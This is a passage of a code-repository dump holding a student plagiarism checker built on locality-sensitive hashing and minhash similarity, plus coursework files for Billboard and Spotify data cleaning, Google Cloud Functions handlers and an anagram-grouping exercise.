sig_band_int + 1\n score = sig_band_int/num_rows\n f5.write(\"%d and %d row similarity for band %d: %f\" %(i, j, k, score))\n f5.write(\"\\n\")\n if score > 0.2:\n set2 = []\n set2.append(i)\n set2.append(j)\n print(set2,score)\n band_can_pairs.append(set2)\n if set2 not in s1:\n s1.append(set2)\n cnt = cnt + num_rows\n all_can_pairs[k] = band_can_pairs\ns1.sort()\nprint(s1)\nprint(all_can_pairs)\n\nfor key, value in all_can_pairs.items():\n f3.write(\"Candidate pairs for band %d are: \" %(key+1))\n f3.write(str(value))\n f3.write(\"\\n\") \nf3.write(\"\\n\\n\\n All combined candidate pairs: \")\nf3.write(str(s1))\n\n#combining all functions to obtain the final candidate pairs\nhash_signature2(sig_mat,20,5)\nprint(\"printing using jaccard\")\ncalculated_jacc_score = cal_jacc_score_candidate_pairs(0.2)\ncalculated_cosine_score = cal_cosine_score_candidate_pairs(0.2)\nprint(calculated_jacc_score)\nf6.write(str(calculated_jacc_score))\nprint(\"printing using cosine\")\nprint(calculated_cosine_score)\nstop = timeit.default_timer()\nq1 = 0\nfor i in dictionary:\n f8.write(str(i))\n f8.write(\"\\n\")\nprint(\"Running time:\",stop - start)\nf7.write(str(stop-start))\nf6.write(\"\\n\\n\\n\\n\")\nf6.write(str(calculated_cosine_score))\nf1.close()\nf2.close()\nf3.close()\nf4.close()\nf5.close()\nf6.close()\nf7.close()\nf8.close()\n\n" }, { "alpha_fraction": 0.6991869807243347, "alphanum_fraction": 0.6991869807243347, "avg_line_length": 14.375, "blob_id": "1c32c9398cdc8f8702814becbcf8fa86406f5560", "content_id": "f6026dee15ca51f9771a2acefeb7f9d356d2d695", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 54, "num_lines": 8, "path": "/README.md", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "# Plaigarism-Checker\nDuplication Detection using Locality Sensitive Hashing\n\n### Team \n* Ayush Laddha\n* Dhruv Gupta\n* Saarthak Jain\n* Smit Shah\n" }, { "alpha_fraction": 0.5670995712280273, "alphanum_fraction": 0.6320346593856812, "avg_line_length": 16.769229888916016, "blob_id": "a3bf2c510e9ebc8c1c36947adbbbbe056851a9eb", "content_id": "6791105508a9910422d49541aa86807a3e5aaf14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 78, "num_lines": 13, "path": "/LSH_Shingling.py", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 13 12:05:59 2019\n\n@author: Ayush RKL\n\"\"\"\n\ntext = \"hello how are you, its jjust a test file to know how to do shingling.\"\n\ndocs = text.split(\" \")\nprint(docs)\nprint(docs[0])\nprint(docs[1])\n" }, { "alpha_fraction": 0.5311717987060547, "alphanum_fraction": 0.5594603419303894, "avg_line_length": 30.47945213317871, "blob_id": "4ae518e30ff4370e63ceaaec328671ed70f10059", "content_id": "6154e4225c27e24139432710f4f4da366b4efdfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9191, "license_type": "no_license", "max_line_length": 111, "num_lines": 292, "path": "/LSH.py", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 17 19:50:54 2019\n\n@author: Ayush RKL\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport random\nimport math\n\nf1 = open(\"ir_jacc_sim.txt\", 'w+')\nf2 = open(\"ir_sig_sim.txt\", 'w+')\nf3 = open(\"ir_sig_sim_band.txt\", 'w+')\nf4 = open(\"ir_cosine_sim.txt\", 'w+')\nf5 = open(\"ir_row_band_sim_scores.txt\", 'w+')\nf6 = open(\"jacc_and_cosine_sim_using_string_hash.txt\", 'w+')\n\n\ndef cal_jaccard_score(sigmat,d1,d2):\n intersec = 0\n uni = 0\n for i in range(0,len(sigmat)):\n if sigmat[i][d1] == sigmat[i][d2]:\n intersec += 1\n uni = len(sigmat)\n return intersec/uni\n\ndef cal_cosine_score(sig_mat,d1,d2):\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n for k in range(0, len(sig_mat)):\n mult = mult + sig_mat[k][d1] * sig_mat[k][d2]\n mod_doc1 = mod_doc1 + sig_mat[k][d1] * sig_mat[k][d1]\n mod_doc2 = mod_doc2 + sig_mat[k][d2] * sig_mat[k][d2]\n cosine_sim = mult / (math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n return cosine_sim\n\ndictionary = list() # a list to store hashed buckets\ndef hash_signature2(sig_mat, b, r):\n print(\"entering hashSig\", b, r)\n startIndex = 0\n for k in range(0, b): # iterating through each bands\n buckets = {} # a dictionary to store hashes of one band of size r rows\n for i in range(0, len_doc): # iterating through each column given by transpose of sig_mat\n toCompress = '' # string to be compressed\n for j in range(startIndex, r + startIndex):\n #print(j)\n toCompress += (str(int(sig_mat[j][i])))\n if toCompress not in buckets:\n buckets[str(toCompress)] = [i]\n else:\n buckets[str(toCompress)].append(i)\n startIndex += r\n # bands_done += 1\n dictionary.append(buckets)\n print(\"printing list of hashtables\")\n# e = 0;\n# for i in dictionary:\n# print(\"bucket\",e)\n# for key, hash in i.items():\n# print(key,hash)\n# e += 1\n \ndef cal_jacc_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_jaccard_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_jaccard_score(sig_mat,hash[j],hash[k])\n #print(cal_jaccard_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\ndef cal_cosine_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_cosine_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_cosine_score(sig_mat,hash[j],hash[k])\n #print(cal_cosine_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\n\ndf = pd.read_csv('news_summary.csv', sep=',', encoding='latin-1')\nd = {}\nshingle = {}\nlen_doc = 0\n\nfor x in range(0, 5):\n string = df['ctext'][x]\n sh = []\n for i in range(0, len(string)-9):\n sh.append(string[i:i+9:1])\n if not string[i:i+9:1] in shingle:\n shingle[string[i:i+9:1]] = [len_doc]\n #global_shingle.append(x[i:i+9:1])\n else:\n shingle[string[i:i+9:1]].append(len_doc)\n d[len_doc] = sh\n len_doc += 1\n#print(d[5])\nprint(len_doc)\n\nfor key,value in shingle.items():\n list1 = set(value)\n shingle[key] = list(list1)\n\n#printing modified shingle dictionary\n#print(\"printing modified shingle dictionary\")\n#for key,value in shingle.items():\n# print(key)\n# print(value)\n\n\n#doing random tests for correctness(to be deleted later)\n#print(d[1])\nprint(len(shingle))\n#print(finalArray)\nshin_hash = {}\nh = 0\nfor i in shingle:\n shin_hash[h] = i\n h = h + 1\n\n\n#building the input matrix\nfinalArray = np.zeros(shape=(len(shingle), len_doc))\ne = 0\nfor key, value in shingle.items():\n #print(value)\n for i in value:\n finalArray[e][i] = 1\n# if i== 2:\n# print(\"yes\")\n e = e + 1\n#for i in range(0, len(shingle)):\n# if finalArray[i][5]==1:\n# print(\"tatti\")\n\n#print(finalArray)\n\n#building the signature matrix using hash functions\n\n\n#print(\"printing mul and add lists\")\n#initializing signature matrix and filling with infinity values\nsig_mat = np.zeros(shape = (100,len_doc))\nfor i in range(0,100):\n for j in range(0,len_doc):\n sig_mat[i][j] = 999999\n\n#building list that will be used for multiplication with x in hash function ax + b i.e. a\nmul_list = set(random.sample(range(0, 1000), 100))\nwhile(len(mul_list)<100):\n mul_list.append(random.sample(range(0, 1000), 1)[0])\nmul_list = list(mul_list)\n#print(mul_list)\n\n#building list that will be used for addition in h(x) in hash function ax + b i.e. b\nadd_list = set(random.sample(range(0, 1000), 100))\nwhile(len(add_list)<100):\n add_list.append(random.sample(range(0, 1000), 1)[0])\nadd_list = list(add_list)\n#print(add_list)\n\n#building 100 hash functions\nprint(\"printing signature matrix\")\nr2 = 0\nfor i in range(0, len(mul_list)):\n for k in range(0,len(shingle)):\n h = (int)(mul_list[i]*(k+1) + add_list[i])%(len(shingle))\n for l in range(0,len_doc):\n if finalArray[k][l] == 1:\n if sig_mat[r2][l] > h:\n sig_mat[r2][l] = h\n r2 = r2 + 1\n#print(sig_mat)\n\n#finding jaccard similarity between each pair of columns in original input matrix(finalArray)\nprint(\"printing similarity between rows\")\ncandidate_pairs = []\nfor i in range(0,len_doc):\n for j in range(i+1,len_doc):\n ori_int = 0\n ori_uni = 0\n sig_int = 0\n sig_uni = 0\n \n #for cosine similarity-\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n\n for k in range(0,len(shingle)):\n if finalArray[k][i] == 1 and finalArray[k][j] == 1:\n ori_int = ori_int + 1\n if finalArray[k][i] == 1 or finalArray[k][j] == 1:\n ori_uni = ori_uni + 1\n\n\n for k in range(0,100):\n if sig_mat[k][i] == sig_mat[k][j]:\n sig_int = sig_int + 1\n mult = mult + sig_mat[k][i] * sig_mat[k][j]\n mod_doc1 = mod_doc1 + sig_mat[k][i]*sig_mat[k][i]\n mod_doc2 = mod_doc2 + sig_mat[k][j]*sig_mat[k][j]\n cosine_sim = mult/(math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n sig_uni = 100\n jacc_sim_ori = ori_int/ori_uni\n sig_sim_sig = sig_int/sig_uni\n if sig_sim_sig > 0.5:\n list1 = []\n list1.append(i+1)\n list1.append(j+1)\n candidate_pairs.append(list1)\n f1.write(\"Jaccard Similarity between doc %d & %d : %f\\n\" %(i+1, j+1, jacc_sim_ori))\n f2.write(\"Signature Similarity between doc %d & %d : %f\\n\" %(i+1, j+1, sig_sim_sig))\n f4.write(\"Cosine Similarity between doc %d & %d : %f\\n\" %(i+1, j+1, cosine_sim))\n #print(jacc_sim_ori)\n #print(sig_sim_sig)\n #print()\n#printing candidate pairs\nprint(\"printing candidate pairs\")\nprint(candidate_pairs)\n\nprint(\"\\n\\n\\n\\nprinting band candidate pairs\")\nnum_rows = 20\nall_can_pairs = {}\ns1 = []\ncnt = 0\nfor k in range(0,int(100/num_rows)):\n band_can_pairs = []\n for i in range(0,len_doc):\n for j in range(i + 1, len_doc):\n sig_band_int = 0\n for l in range(cnt, cnt + num_rows):\n if sig_mat[l][i] == sig_mat[l][j]:\n sig_band_int = sig_band_int + 1\n score = sig_band_int/num_rows\n f5.write(\"%d and %d row similarity for band %d: %f\" %(i, j, k, score))\n f5.write(\"\\n\")\n if score > 0.2:\n set2 = []\n set2.append(i+1)\n set2.append(j+1)\n print(set2,score)\n band_can_pairs.append(set2)\n if set2 not in s1:\n s1.append(set2)\n cnt = cnt + num_rows\n all_can_pairs[k] = band_can_pairs\ns1.sort()\nprint(s1)\nprint(all_can_pairs)\n#print(finalArray[0:10])\n\nfor key, value in all_can_pairs.items():\n f3.write(\"Candidate pairs for band %d are: \" %(key+1))\n f3.write(str(value))\n f3.write(\"\\n\")\n \nf3.write(\"\\n\\n\\n All combined candidate pairs: \")\nf3.write(str(s1))\n\nhash_signature2(sig_mat,20,5)\nprint(\"printing using jaccard\")\ncalculated_jacc_score = cal_jacc_score_candidate_pairs(0.2)\ncalculated_cosine_score = cal_cosine_score_candidate_pairs(0.2)\nprint(calculated_jacc_score)\nf6.write(str(calculated_jacc_score))\nprint(\"printing using cosine\")\nprint(calculated_cosine_score)\nf6.write(\"\\n\\n\\n\\n\")\nf6.write(str(calculated_cosine_score))\n\nf1.close()\nf2.close()\nf3.close()\nf4.close()\nf5.close()\nf6.close()" } ]
5
tianlinhe/new
https://github.com/tianlinhe/new
d08d547bf6e344e7ded66267c7cee2c52238ec4a
1d416b2167c96f1b1f12899d9276dc9f60f8722b
da4447698b882aed702039b0ae5469d99c802636
refs/heads/master
2021-01-19T17:25:34.726685
2018-04-24T11:18:28
2018-04-24T11:18:28
82,455,872
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5840113162994385, "alphanum_fraction": 0.6151397228240967, "avg_line_length": 38.26388931274414, "blob_id": "23b20b26d15e689228d329b85bc92ad38e90cc50", "content_id": "149974f23e4314449768214fe58c4ffc2a818d6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2827, "license_type": "no_license", "max_line_length": 113, "num_lines": 72, "path": "/python/interfere_overpal.py", "repo_name": "tianlinhe/new", "src_encoding": "UTF-8", "text": "#it shows the uncorrected Log2 (L/H)\n#it matches MS-hits with Interferome database\n#input 1)sheet=masterproteins from raw file\n # 2) Interferom\nimport pandas as pd\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\ndef f(value):\n return((-1)*math.log(value,2))\n\ndef interferome_overlap(input1, input2):\n # open the rwo file, sheet masterproteins\n xlsx = pd.ExcelFile(input1)\n# get the first sheet=master proteins as an object\n masterproteins = xlsx.parse(1)\n# only the rows with defined values of Abundance Ratio: (Heavy) / (Light) are kept\n df = masterproteins[pd.notnull(masterproteins['Abundance Ratio: (Heavy) / (Light)'])]\n df=df.sort_values(['Abundance Ratio: (Heavy) / (Light)'], ascending = False)\n foldchange = np.array(df.loc[:,'Abundance Ratio: (Heavy) / (Light)'])\n f1 = np.vectorize(f, otypes=[np.float])\n x = f1(foldchange)\n df['LOG2 (L/H)']=x\n genelist = np.array(df.loc[:,'Description'])\n \n # open the rwo file, sheet masterproteins\n xlsx = pd.ExcelFile(input2)\n#df2=foldchange Up2 and Down10000 in interferome database -> up-regulation\n df2 = xlsx.parse(1)\n df2.drop(df2.index[0:18], inplace=True)\n df2.columns = df2.iloc[0]\n df2.drop(df2.index[0],inplace = True)\n#df3=foldchange Up10000 and Down2 in interferome datbase -> down-regulation \n df3 = xlsx.parse(2)\n df3.drop(df3.index[0:18], inplace=True)\n df3.columns = df3.iloc[0]\n df3.drop(df3.index[0],inplace = True)\n \n fh, (ax1, ax) = plt.subplots(1, 2, sharey=True,sharex=True,figsize=(15,15))\n p = np.linspace(1,0,len(x))\n ax1.scatter(p,x,facecolors='none', edgecolors='grey',label='significant hits')\n \n \n count = 0\n for index, row in df2.iterrows():\n \n for row_num in range(len(foldchange)):\n \n if row['Gene Name'] == df.loc[:,'Description'][row_num][0:-1]:\n up=ax.scatter(p[row_num],df.loc[:,'LOG2 (L/H)'][row_num],facecolors='none', edgecolors='red')\n count += 1\n break \n print (\"Up-regulated IRGs: \", count) \n \n count = 0\n for index, row in df3.iterrows():\n \n for row_num in range(len(foldchange)):\n \n if row['Gene Name'] == df.loc[:,'Description'][row_num][0:-1]:\n down=ax.scatter(p[row_num],df.loc[:,'LOG2 (L/H)'][row_num],facecolors='none', edgecolors='black')\n count += 1\n break \n print (\"Down-regulated IRGs: \", count) \n \n ax.legend((up,down),('up-regulated IRGs','down-regulated IRGs'),loc='upper right')\n ax1.legend('hits',loc='upper right')\n plt.xlabel('Fraction')\n plt.ylabel('LOG2 (L/H)') \n plt.show()\n \ninterferome_overlap(\"20180319_04_Qp1_Nyberg_beads.xlsx\",\"Interferome/Interferome_genelist.xlsx\")\n" }, { "alpha_fraction": 0.5565749406814575, "alphanum_fraction": 0.5884665846824646, "avg_line_length": 34.21538543701172, "blob_id": "9827ce327ae1987556382d25fb7db966e5a87c28", "content_id": "f54a154e8d73c342dd8c9d9656389d1451a3c958", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2289, "license_type": "no_license", "max_line_length": 138, "num_lines": 65, "path": "/python/sigmoidal.py", "repo_name": "tianlinhe/new", "src_encoding": "UTF-8", "text": "#a \"sigmoidal\" curve for log2 (l/H) in SILAC of Mar\nimport pandas as pd\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\ndef f(value):\n return((-1)*math.log(value,2))\n\ndef one_d_dot(input):\n # open the excelfile\n xlsx = pd.ExcelFile(input)\n# get the first sheet=master proteins as an object\n masterproteins = xlsx.parse(1)\n# only the rows with defined values of Abundance Ratio: (Heavy) / (Light) are kept\n df = masterproteins[pd.notnull(masterproteins['Abundance Ratio: (Heavy) / (Light)'])]\n df=df.sort_values(['Abundance Ratio: (Heavy) / (Light)'], ascending = False)\n foldchange = np.array(df.loc[:,'Abundance Ratio: (Heavy) / (Light)'])\n f1 = np.vectorize(f, otypes=[np.float])\n x = f1(foldchange)\n df['LOG2 (L/H)']=x\n \n#split dots in 8 color categories according to their x-value\n#value of p makes it a sigmoidal shape. \n p = np.linspace(1,0,len(x))\n k=p\n x_color = []\n k_color = []\n separator = np.array([-6,-4,-2,-0,2,4,6,8])\n \n for number in separator:\n count =0\n \n for item in x:\n if item < number:\n count +=1\n \n alist.append(count)\n x2=np.split(x,[count,len(x)])\n x_color.append(x2[0])\n x=x2[1]\n k2=np.split(k,[count,len(k)])\n k_color.append(k2[0])\n k=k2[1] \n\n#plot the dots with 8 colors \n fh, ax = plt.subplots(1,1)\n colors = ['darkblue','cornflowerblue','lightskyblue','powderblue','mistyrose','lightcoral','firebrick','maroon']\n \n for i in range(0,len(x_color)):\n ax.scatter(x_color[i],k_color[i],color=colors[i])\n \n #add annotations for proteins in dic(indicators) \n indicators = {'P50747':'Biotin ligase','Q99873':'PRMT1','P17181':'IFNAR1','P42224':'STAT1'}\n for item in indicators:\n for row_num in range(len(foldchange)):\n if item == df.loc[:,'Accession'][row_num]:\n ax.annotate(indicators[item],(df.loc[:,'LOG2 (L/H)'][row_num],p[row_num]),arrowprops=dict(facecolor='black', shrink=0.05))\n break\n \n #ax.axes.get_yaxis().set_visible(False)\n plt.ylabel('Fraction')\n plt.xlabel('LOG2 (L/H)')\n plt.show()\n \none_d_dot(\"20180319_04_Qp1_Nyberg_beads.xlsx\")\n" }, { "alpha_fraction": 0.578847348690033, "alphanum_fraction": 0.6117796301841736, "avg_line_length": 34.8863639831543, "blob_id": "a41388224121212c00f252bf075a1d0e99e845e6", "content_id": "54315f5ef8a1c3da76fc0d1495944ea71c017d4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1579, "license_type": "no_license", "max_line_length": 138, "num_lines": 44, "path": "/python/corrected_sigmoidal.py", "repo_name": "tianlinhe/new", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\ndef f(value):\n return((-1)*math.log(value,2))\n\ndef one_d_dot(input):\n # open the excelfile\n xlsx = pd.ExcelFile(input)\n# get the first sheet=2_masterproteins as an object\n masterproteins = xlsx.parse(2)\n# only the rows with defined values of Abundance Ratio: (Heavy) / (Light) are kept\n df = masterproteins[pd.notnull(masterproteins['Abundance Ratio: (Heavy) / (Light)'])]\n df=df.sort_values(['Abundance Ratio: (Heavy) / (Light)'], ascending = False)\n foldchange = np.array(df.loc[:,'Abundance Ratio: (Heavy) / (Light)'])\n f1 = np.vectorize(f, otypes=[np.float])\n x = f1(foldchange)\n df['LOG2 (L/H)']=x\n \n\n\n#plot the dots with 8 colors \n fh, ax = plt.subplots(1,1)\n \n \n p = np.linspace(1,0,len(x))\n for i in range(0,len(x)):\n ax.scatter(p[i],x[i],facecolors='none', edgecolors='grey')\n \n #add annotations for proteins in dic(indicators) \n indicators = {'P50747':'Biotin ligase','Q99873':'PRMT1','P17181':'IFNAR1','P42224':'STAT1'}\n for item in indicators:\n for row_num in range(len(foldchange)):\n if item == df.loc[:,'Accession'][row_num]:\n ax.annotate(indicators[item],(p[row_num],df.loc[:,'LOG2 (L/H)'][row_num]),arrowprops=dict(facecolor='black', shrink=0.05))\n break\n \n #ax.axes.get_yaxis().set_visible(False)\n plt.xlabel('Fraction')\n plt.ylabel('LOG2 (L/H)')\n plt.show()\n \none_d_dot(\"20180319_04_Qp1_Nyberg_beads.xlsx\")\n" } ]
3
Cedric-Liu/Coding-Journal
https://github.com/Cedric-Liu/Coding-Journal
eac200d3259904c797a3d97a4418960e3d1b8004
3e2eeb8fc0e907e0012d6e235ddb8f13773b6969
705c7be565b9eb7435fe487221f7b4fe4802543f
refs/heads/master
2020-04-25T08:14:09.361296
2019-03-04T02:52:11
2019-03-04T02:52:11
172,640,530
2
0
MIT
2019-02-26T04:55:35
2019-05-11T23:26:32
2019-07-17T19:37:57
Jupyter Notebook
[ { "alpha_fraction": 0.7046632170677185, "alphanum_fraction": 0.7046632170677185, "avg_line_length": 13.84615421295166, "blob_id": "a14e263ee2884dbe825ecfb0ca83ba8068c70111", "content_id": "19cc93b63ccbef43ad863bcbf9fce765876cf19b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "permissive", "max_line_length": 53, "num_lines": 13, "path": "/Text Analysis and GCP Deployment/conftest.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import os\n\nimport pytest\n\n\[email protected]\ndef rootdir():\n return os.path.dirname(os.path.abspath(__file__))\n\n\[email protected]\ndef datadir(rootdir):\n return os.path.join(rootdir, 'data')\n" }, { "alpha_fraction": 0.6267166137695312, "alphanum_fraction": 0.6292135119438171, "avg_line_length": 23.272727966308594, "blob_id": "acb4e4bc857e40164ad5226d69d59e9366724726", "content_id": "bd4403ff4342df787bdc737d35c69c51ebc3ebe5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 801, "license_type": "permissive", "max_line_length": 68, "num_lines": 33, "path": "/Text Analysis and GCP Deployment/music1030/fuzzy.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "from collections import Counter\nfrom typing import List\n\nimport pandas as pd\n\n\ndef jaccard_similarity(a: str,\n b: str) -> float:\n \"\"\"Takes in two strings and computes their letter-wise\n Jaccard similarity for bags.\n\n Case should be ignored.\n \"\"\"\n # TODO: Task 3\n # YOUR CODE HERE\n pass\n\n\ndef fuzzy_merge(left: pd.DataFrame,\n right: pd.DataFrame,\n on: List[str]) -> pd.DataFrame:\n \"\"\"Merge DataFrame objects by performing a fuzzy\n database-style join operation by columns.\n\n :param left: a DataFrame\n :param right: a DataFrame\n :param on: Column or index level names to join on. These must be\n found in both DataFrames.\n :return: the merged DataFrame\n \"\"\"\n # TODO: Task 3\n # YOUR CODE HERE\n pass\n" }, { "alpha_fraction": 0.4516128897666931, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 15, "blob_id": "5bef12e6b45f675b7f527fadebd4b21b549e81a2", "content_id": "541225d43ae962b42b010879eddcd2a197011ed9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 31, "license_type": "permissive", "max_line_length": 16, "num_lines": 2, "path": "/Text Analysis and GCP Deployment/requirements.txt", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "requests==2.19.1\npandas==0.23.4" }, { "alpha_fraction": 0.6438356041908264, "alphanum_fraction": 0.6605783700942993, "avg_line_length": 25.280000686645508, "blob_id": "9b73ca68b68f150b423ffb23c0700caa6b351f10", "content_id": "20b82f28b0a49d101c4e4a040204a88e5df89a66", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "permissive", "max_line_length": 60, "num_lines": 25, "path": "/Text Analysis and GCP Deployment/main.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import flask\nimport pandas as pd\n\nfrom music1030.billboard import clean_billboard\nfrom music1030.spotify import clean_spotify_tracks\n\n\ndef handle_billboard(request: flask.Request):\n \"\"\"\n\n :param request: a flask Request containing the JSON data\n :return: a\n \"\"\"\n data = request.get_json()\n df = pd.DataFrame(data)\n cleaned_df: pd.DataFrame = clean_billboard(df)\n cleaned_json = cleaned_df.to_json(orient='records')\n return flask.Response(response=cleaned_json,\n status=200,\n mimetype='application/json')\n\n\ndef handle_spotify(request: flask.Request):\n # YOUR CODE HERE\n pass\n" }, { "alpha_fraction": 0.458781361579895, "alphanum_fraction": 0.4722222089767456, "avg_line_length": 30.91428565979004, "blob_id": "2a49bac4ea1f109f63b7c1e51cf21cfdae29d74f", "content_id": "c9620fd9c90ad2e87faadd12524cb3cdd6294ab6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1116, "license_type": "permissive", "max_line_length": 73, "num_lines": 35, "path": "/Data Structure and Algorithms/Group Anagrams.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "# def groupAnagrams(strs):\n# def is_anagram(a, b):\n# count = {}\n# for char in a:\n# count[char] = count.get(char, 0) + 1\n# for char in b:\n# if not char in count.keys():\n# return False\n# else:\n# count[char] -= 1\n# if count[char] < 0:\n# return False\n# return sum(count.values()) == 0\n#\n# hashdic = {}\n# used_index = []\n# for s1 in strs:\n# for s2 in strs:\n# if is_anagram(s1, s2) and strs.index(s2) not in used_index:\n# hashdic[s1] = hashdic.get(s1, [])\n# hashdic[s1].append(s2)\n# used_index.append(strs.index(s2))\n# res = [hashdic[key] for key in hashdic.keys()]\n# return res\n\ndef groupAnagrams(strs):\n hashdic = {}\n for s in strs:\n if ''.join(sorted(s)) in hashdic.keys():\n hashdic[''.join(sorted(s))].append(s)\n else:\n hashdic[''.join(sorted(s))] = [s]\n return list(hashdic.values())\n\nprint(groupAnagrams([\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]))" }, { "alpha_fraction": 0.2823967933654785, "alphanum_fraction": 0.3235378563404083, "avg_line_length": 25.727970123291016, "blob_id": "43113c9c6fde79755a59795b3b5b8dabc976ceff", "content_id": "6e99bf6b9c895e9441be486a3d5158ff76d114f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6976, "license_type": "permissive", "max_line_length": 75, "num_lines": 261, "path": "/Text Analysis and GCP Deployment/main_test.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import json\n\nimport requests\n\n# TODO: You should put your cloud function URL here.\n# The URL below links to the TA version\nBILLBOARD_URL = 'https://us-central1-personal-198408.cloudfunctions.net' \\\n '/handle_billboard'\nSPOTIFY_URL = 'https://us-central1-personal-198408.cloudfunctions.net' \\\n '/handle_spotify'\n\n\ndef test_handle_billboard():\n response = requests.post(\n BILLBOARD_URL,\n headers={\n 'Content-type': 'application/json'\n },\n data=json.dumps([{\n \"artist_names\": \"Justin Bieber\",\n \"rank\": 1,\n \"song_name\": \"What Do You Mean?\",\n \"week\": \"2015-09-19\"\n }])\n )\n assert response.json() == [\n {\"rank\": 1,\n \"song_name\": \"What Do You Mean?\",\n \"week\": \"2015-09-19\",\n \"main_artist_name\": \"justin bieber\"\n }\n ]\n\n\ndef test_handle_spotify(datadir):\n data = [{\n \"album\": {\n \"album_type\": \"album\",\n \"artists\": [\n {\n \"external_urls\": {\n \"spotify\": \"https://open.spotify.com/artist/\"\n \"1E2AEtxaFaJtH0lO7kgNKw\"\n },\n \"href\": \"https://api.spotify.com/v1/artists/\"\n \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"id\": \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"name\": \"Russell Dickerson\",\n \"type\": \"artist\",\n \"uri\": \"spotify:artist:1E2AEtxaFaJtH0lO7kgNKw\"\n }\n ],\n \"available_markets\": [\n \"AD\",\n \"AR\",\n \"AT\",\n \"AU\",\n \"BE\",\n \"BG\",\n \"BO\",\n \"BR\",\n \"CA\",\n \"CH\",\n \"CL\",\n \"CO\",\n \"CR\",\n \"CY\",\n \"CZ\",\n \"DE\",\n \"DK\",\n \"DO\",\n \"EC\",\n \"EE\",\n \"ES\",\n \"FI\",\n \"FR\",\n \"GB\",\n \"GR\",\n \"GT\",\n \"HK\",\n \"HN\",\n \"HU\",\n \"ID\",\n \"IE\",\n \"IS\",\n \"IT\",\n \"JP\",\n \"LI\",\n \"LT\",\n \"LU\",\n \"LV\",\n \"MC\",\n \"MT\",\n \"MX\",\n \"MY\",\n \"NI\",\n \"NL\",\n \"NO\",\n \"NZ\",\n \"PA\",\n \"PE\",\n \"PH\",\n \"PL\",\n \"PT\",\n \"PY\",\n \"SE\",\n \"SG\",\n \"SK\",\n \"SV\",\n \"TH\",\n \"TR\",\n \"TW\",\n \"US\",\n \"UY\"\n ],\n \"external_urls\": {\n \"spotify\": \"https://open.spotify.com/album/\"\n \"1B6iXA14exgSuBrdHoNqrB\"\n },\n \"href\": \"https://api.spotify.com/v1/albums/\"\n \"1B6iXA14exgSuBrdHoNqrB\",\n \"id\": \"1B6iXA14exgSuBrdHoNqrB\",\n \"images\": [\n {\n \"height\": 640,\n \"url\": \"https://i.scdn.co/image/\"\n \"736107f18625aec57f16a6d84ef51820b139a39d\",\n \"width\": 640\n },\n {\n \"height\": 300,\n \"url\": \"https://i.scdn.co/image/\"\n \"3c0f3d5fef38df51cc160f342275171bfe888822\",\n \"width\": 300\n },\n {\n \"height\": 64,\n \"url\": \"https://i.scdn.co/image/\"\n \"d65a7cbb93752e9442c3cb41c80493925bd70eb9\",\n \"width\": 64\n }\n ],\n \"name\": \"Yours - EP\",\n \"type\": \"album\",\n \"uri\": \"spotify:album:1B6iXA14exgSuBrdHoNqrB\"\n },\n \"artists\": [\n {\n \"external_urls\": {\n 